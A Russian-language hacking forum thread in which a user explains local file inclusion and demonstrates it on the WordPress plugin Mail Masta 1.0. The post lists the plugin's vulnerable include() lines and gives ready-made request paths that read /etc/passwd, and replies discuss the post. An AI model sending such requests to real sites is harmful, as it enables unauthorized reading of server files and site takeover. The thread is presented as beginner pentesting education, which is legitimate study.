• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

ПЕНТЕСТИНГ Уязвимость в плагине Mail Masta Plugin 1.0 для WordPress (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

Hooko

Уважаемый пользователь
Форумчанин
Регистрация
24.08.2016
Сообщения
230
Репутация
346
Jabber
Сегодня господа мы поговорим о LFI уязвимости в плагине Mail Masta Plugin 1.0 который используется в WordPress

Для начало разберемся что такое LFI
LFI - Local file include - это популярный и часто эксплуатируемый способ взлома сайтов и веб приложений.
LFI - это одна из самых опасных уязвимостей сайта.
Эксплуатация LFI представляет максимальную угрозу для атакуемого сайта, и практически во всех случаях приводит к его взлому.
LFI - это возможность использования локальных системных файлов сервера. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.
LFI - позволяет злоумышленнику выполнить или получить данные с локального файла.
LFI возникает в случае, когда проверка входящих данных и параметров в коде сайта отсутствует или недостаточна.
Возможность эксплуатации LFI (Remote file include) возникает из за грубейших ошибок разработки сайта, отсутствия фильтрации передающих параметров, а также некорректной настройки сервера.

Для примера:
http://site.ru/preview.php?file=example.html
http://site.ru/preview.php?file=../../../../etc/passwd

Уязвимые строки в плагине
Код:
Файл /inc/campaign/count_of_send.php
Строка 4 : include($_GET[’pl’]);

Файл /inc/lists/csvexport.php:
Строка 5: include($_GET[’pl’]);

Файл /inc/campaign/count_of_send.php
Строка 4: include($_GET[’pl’]);

Файл /inc/lists/csvexport.php
Строка 5: include($_GET[’pl’]);

Файл /inc/campaign/count_of_send.php
Строка 4: include($_GET[’pl’]);
Для примера возьмем сайт
http://sire.ru/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd






Как вы видите благодаря этому багу я получил доступ к файлы /etc/passwd
 

vanya_ivanov

Житель форума
Форумчанин
Регистрация
16.09.2016
Сообщения
1
Дядя, а чего плагин то такой школьный выбрал или это репост с happy hack?
 

Hooko

Уважаемый пользователь
Форумчанин
Регистрация
24.08.2016
Сообщения
230
Репутация
346
Jabber

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 376
Репутация
7 873
Telegram
Хорошая статья, создал специальный раздел для паблик-статей по пентестеснгу и вопросов:ПЕНТЕСТИНГ (Паблик)

По больше-бы статей для новичков, особенно по Кали и т.д., актуально сейчас ! :)

А комменты на подобие этого:
Дядя, а чего плагин то такой школьный выбрал или это репост с happy hack?
Можно не слушать, чел. так и не привел примеры своих статей и работ, кроме "Бла-бла-бла", так ничего и не услышал здесь на борде...Dmeh-Smeh-Smeh!!!